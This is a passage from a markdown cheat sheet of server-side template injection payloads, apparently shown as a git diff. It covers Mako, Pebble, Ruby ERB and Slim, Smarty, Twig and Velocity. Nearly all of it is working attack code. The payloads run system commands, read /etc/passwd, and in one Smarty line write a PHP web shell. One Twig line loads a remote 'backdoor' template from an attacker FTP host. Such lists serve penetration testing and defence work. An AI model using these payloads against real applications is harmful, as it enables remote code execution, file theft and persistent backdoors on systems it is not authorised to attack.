${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
|
||||||
|
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
|
||||||
|
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
|
||||||
|
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
|
||||||
|
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
|
||||||
|
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
|
||||||
|
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
|
||||||
|
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||||
|
```
|
||||||
|
|
||||||
|
PoC :
|
||||||
|
|
||||||
|
```python
|
||||||
|
>>> print(Template("${self.module.cache.util.os}").render())
|
||||||
|
<module 'os' from '/usr/local/lib/python3.10/os.py'>
|
||||||
|
```
|
||||||
|
|
||||||
|
Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
||||||
|
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Pebble
|
||||||
|
|
||||||
|
[Official website](https://pebbletemplates.io/)
|
||||||
|
> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
|
||||||
|
|
||||||
|
### Pebble - Basic injection
|
||||||
|
|
||||||
|
```java
|
||||||
|
{{ someString.toUPPERCASE() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Pebble - Code execution
|
||||||
|
|
||||||
|
Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`.
|
||||||
|
|
||||||
|
New version of Pebble :
|
||||||
|
|
||||||
|
```java
|
||||||
|
{% set cmd = 'id' %}
|
||||||
|
{% set bytes = (1).TYPE
|
||||||
|
.forName('java.lang.Runtime')
|
||||||
|
.methods[6]
|
||||||
|
.invoke(null,null)
|
||||||
|
.exec(cmd)
|
||||||
|
.inputStream
|
||||||
|
.readAllBytes() %}
|
||||||
|
{{ (1).TYPE
|
||||||
|
.forName('java.lang.String')
|
||||||
|
.constructors[0]
|
||||||
|
.newInstance(([bytes]).toArray()) }}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Ruby
|
||||||
|
|
||||||
|
### Ruby - Basic injections
|
||||||
|
|
||||||
|
ERB:
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= 7 * 7 %>
|
||||||
|
```
|
||||||
|
|
||||||
|
Slim:
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
#{ 7 * 7 }
|
||||||
|
```
|
||||||
|
|
||||||
|
### Ruby - Retrieve /etc/passwd
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= File.open('/etc/passwd').read %>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Ruby - List files and directories
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= Dir.entries('/') %>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Ruby - Code execution
|
||||||
|
|
||||||
|
Execute code using SSTI for ERB engine.
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= system('cat /etc/passwd') %>
|
||||||
|
<%= `ls /` %>
|
||||||
|
<%= IO.popen('ls /').readlines() %>
|
||||||
|
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
|
||||||
|
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
|
||||||
|
```
|
||||||
|
|
||||||
|
Execute code using SSTI for Slim engine.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
#{ %x|env| }
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Smarty
|
||||||
|
|
||||||
|
[Official website](https://www.smarty.net/docs/en/)
|
||||||
|
> Smarty is a template engine for PHP.
|
||||||
|
|
||||||
|
```python
|
||||||
|
{$smarty.version}
|
||||||
|
{php}echo `id`;{/php} //deprecated in smarty v3
|
||||||
|
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||||
|
{system('ls')} // compatible v3
|
||||||
|
{system('cat index.php')} // compatible v3
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Twig
|
||||||
|
|
||||||
|
[Official website](https://twig.symfony.com/)
|
||||||
|
> Twig is a modern template engine for PHP.
|
||||||
|
|
||||||
|
### Twig - Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{7*7}}
|
||||||
|
{{7*'7'}} would result in 49
|
||||||
|
{{dump(app)}}
|
||||||
|
{{app.request.server.all|join(',')}}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Twig - Template format
|
||||||
|
|
||||||
|
```python
|
||||||
|
$output = $twig > render (
|
||||||
|
'Dear' . $_GET['custom_greeting'],
|
||||||
|
array("first_name" => $user.first_name)
|
||||||
|
);
|
||||||
|
|
||||||
|
$output = $twig > render (
|
||||||
|
"Dear {first_name}",
|
||||||
|
array("first_name" => $user.first_name)
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Twig - Arbitrary File Reading
|
||||||
|
|
||||||
|
```python
|
||||||
|
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
|
||||||
|
```
|
||||||
|
|
||||||
|
### Twig - Code execution
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{self}}
|
||||||
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
{{['id']|filter('system')}}
|
||||||
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
|
```
|
||||||
|
|
||||||
|
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
|
||||||
|
email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Velocity
|
||||||
|
|
||||||
|
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
|
||||||
|
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
|
||||||
|
|
||||||
|
```python
|
||||||
|
#set($str=$class.inspect("java.lang.String").type)
|
||||||
|
#set($chr=$class.inspect("java.lang.Character").type)
|
||||||
|
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
|
||||||
|
$ex.waitFor()
|
||||||
|
#set($out=$ex.getInputStream())
|
||||||
|
#foreach($i in [1..$out.available()])
|
||||||
|
$str.valueOf($chr.toChars($out.read()))
|
||||||
|
#end
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
|
Loading…
Reference in New Issue
Block a user